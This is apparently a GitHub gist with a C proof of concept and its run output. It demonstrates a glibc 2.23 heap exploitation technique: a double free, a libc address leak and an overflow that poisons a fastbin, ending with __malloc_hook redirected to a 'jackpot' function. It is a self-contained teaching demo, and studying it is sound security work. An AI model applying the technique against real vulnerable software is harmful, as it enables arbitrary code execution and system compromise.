Skip to content

Instantly share code, notes, and snippets.

@inaz2
Last active January 6, 2020 12:05
Show Gist options
  • Save inaz2/0fbfe243ca9e4b904edad037d0d76697 to your computer and use it in GitHub Desktop.
Save inaz2/0fbfe243ca9e4b904edad037d0d76697 to your computer and use it in GitHub Desktop.
overwrite malloc_hook by fastbins unlink attack
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void jackpot() { puts("jackpot!"); }
int main()
{
puts("[+] allocate p1, p2");
char *p1 = malloc(0x100);
char *p2 = malloc(0x100);
printf("p1 = %p\n", p1);
printf("p2 = %p\n", p2);
puts("\n[+] free p1, p2");
free(p1);
free(p2);
puts("\n[+] allocate p3");
char *p3 = malloc(0x100);
printf("p3 = %p\n", p3);
puts("\n[+] p1 double free");
free(p1);
puts("\n[+] leak libc address via p3");
void *arena_top = *(void **)p3;
void *malloc_hook = arena_top - 0x68;
printf("arena_top = %p\n", arena_top);
printf("malloc_hook = %p\n", malloc_hook);
puts("\n[+] allocate p4");
char *p4 = malloc(0x100);
printf("p4 = %p\n", p4);
puts("\n[+] allocate p5 with size 0x60");
char *p5 = malloc(0x60);
printf("p5 = %p\n", p5);
puts("\n[+] free p5");
free(p5);
puts("\n[+] abuse p4 overflow");
memset(p4, 'A', 0x100);
*(void **)(p4+0x108) = 0x71;
*(void **)(p4+0x110) = (void *)malloc_hook-0x20-3;
puts("\n[+] allocate p6, p7 with size 0x60");
char *p6 = malloc(0x60);
char *p7 = malloc(0x60);
printf("p6 = %p\n", p6);
printf("p7 = %p\n", p7);
puts("\n[+] overwrite *(p7+0x13) = malloc_hook");
memset(p7, 'A', 0x13);
*(void **)(p7+0x13) = jackpot;
puts("\n[+] allocate p8");
char *p8 = malloc(0x100);
printf("p8 = %p\n", p8);
return 0;
}
$ gcc fastbins_malloc_hook.c -o fastbins_malloc_hook
fastbins_malloc_hook.c: In function ‘main’:
fastbins_malloc_hook.c:45:26: warning: assignment makes pointer from integer without a cast [-Wint-conversion]
*(void **)(p4+0x108) = 0x71;
^
$ ./fastbins_malloc_hook
[+] allocate p1, p2
p1 = 0xd36420
p2 = 0xd36530
[+] free p1, p2
[+] allocate p3
p3 = 0xd36420
[+] p1 double free
[+] leak libc address via p3
arena_top = 0x7f30e669eb78
malloc_hook = 0x7f30e669eb10
[+] allocate p4
p4 = 0xd36420
[+] allocate p5 with size 0x60
p5 = 0xd36530
[+] free p5
[+] abuse p4 overflow
[+] allocate p6, p7 with size 0x60
p6 = 0xd36530
p7 = 0x7f30e669eafd
[+] overwrite *(p7+0x13) = malloc_hook
[+] allocate p8
jackpot!
p8 = 0x9
$ /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al.
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 5.3.1 20160413.
Available extensions:
crypt add-on version 2.1 by Michael Glad and others
GNU Libidn by Simon Josefsson
Native POSIX Threads Library by Ulrich Drepper et al
BIND-8.2.3-T5B
libc ABIs: UNIQUE IFUNC
For bug reporting instructions, please see:
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment